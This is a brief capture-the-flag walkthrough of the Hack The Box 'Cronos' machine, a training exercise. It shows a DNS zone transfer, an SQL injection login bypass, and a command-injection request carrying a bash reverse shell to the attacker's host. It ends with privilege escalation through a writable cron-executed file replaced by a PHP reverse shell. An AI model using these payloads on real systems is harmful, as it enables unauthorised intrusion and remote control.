HTB - Cronos

In Cronos we get exposed to some new and some old! Some DNS enumeration followed by SQLi with a bit of OS command execution will get us on the box. Privesc we abuse a particular cronjob.

First, our can:

22,53,80!

DNS enumeration:

First step is to resolve the IPs of Cronos, use nslookup

Any time we see DNS running on TCP, we should try for a zone transer:

Perfect! Lets add these names to our /etc/hosts file:

Next step visiting cronos.htb

Nothing much going on here so I’ll pivot over to admin.cronos.htb

After many trivial and useless attempts to crack this, I finally found a SQLi that worked:

' or 1=1-- -

Absolutely brutal but a reminder to run through the gambit before you call it quits!

Now depending on what is happening here I think we can issue some OS commands by chaining commands and if we can, reverse shell!

Even easier than that I realized I could intercept the request and place my own command!

command=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/443+0>%261'%26&host=8.8.8.8

and we got a shell!

Grab the user flag and your PrivEsc tool, I used LinEnum.sh here.

It leads us to a cron job and I notice I have write permissions to the file that’s being run.

I went into my php reverse shell toolkit and grabbed my reverse shell. Copied it onto artisan and waited:

Grab the flag and all set!